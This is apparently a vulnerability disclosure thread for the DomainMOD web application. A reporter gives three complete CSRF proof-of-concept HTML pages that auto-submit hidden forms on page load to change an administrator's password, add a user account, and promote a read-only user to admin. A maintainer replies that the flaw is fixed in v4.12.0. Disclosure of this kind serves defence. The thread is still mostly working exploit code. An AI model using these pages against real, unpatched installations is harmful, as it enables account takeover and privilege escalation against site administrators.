There are three CSRF vulnerability that can add the administrator account or change the read-only user to admin or change admin password

[anquanquantao]

After the administrator logged in, open the following three page.

change password:
cp.html

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='new_password' value='hack1234' />";
fields += "<input type='hidden' name='new_password_confirmation' value='hack1234' />";  

var url = "https://demo.domainmod.org/settings/password/";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

add the administrator account
add a read-only user
aru.html

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='new_first_name' value='hack1234' />";
fields += "<input type='hidden' name='new_last_name' value='hack1234' />";  
fields += "<input type='hidden' name='new_username' value='hack1234' />";
fields += "<input type='hidden' name='new_email_address' value='hack@hack.com' />";  

var url = "https://demo.domainmod.org/admin/users/add.php";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

change the read-only user to admin
crta.html

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='new_first_name' value='hack1234' />";
fields += "<input type='hidden' name='new_last_name' value='hack1234' />";  
fields += "<input type='hidden' name='new_username' value='hack1234' />";
fields += "<input type='hidden' name='new_email_address' value='hack@hack.com' />";  
fields += "<input type='hidden' name='new_currency' value='USD' />";
fields += "<input type='hidden' name='new_timezone' value='Canada/Pacific' />";  
fields += "<input type='hidden' name='new_expiration_emails' value='1' />";
fields += "<input type='hidden' name='new_is_admin' value='1' />";
fields += "<input type='hidden' name='new_read_only' value='0' />";
fields += "<input type='hidden' name='new_is_active' value='1' />";  
fields += "<input type='hidden' name='original_username' value='hack1234' />";
fields += "<input type='hidden' name='new_uid' value='2' />";

var url = "https://demo.domainmod.org/admin/users/edit.php?uid=2";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

[chetcuti]

This was fixed in v4.12.0, which was released earlier today.

Thanks for the report!